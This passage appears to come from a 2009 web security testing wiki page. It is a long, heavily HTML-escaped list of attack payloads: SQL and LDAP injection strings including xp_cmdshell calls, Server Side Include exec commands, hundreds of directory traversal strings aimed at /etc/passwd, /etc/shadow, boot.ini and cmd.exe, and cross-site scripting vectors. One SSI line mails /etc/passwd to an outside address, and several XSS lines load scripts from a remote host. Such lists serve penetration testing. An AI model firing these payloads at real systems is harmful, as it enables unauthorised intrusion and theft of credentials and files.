' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
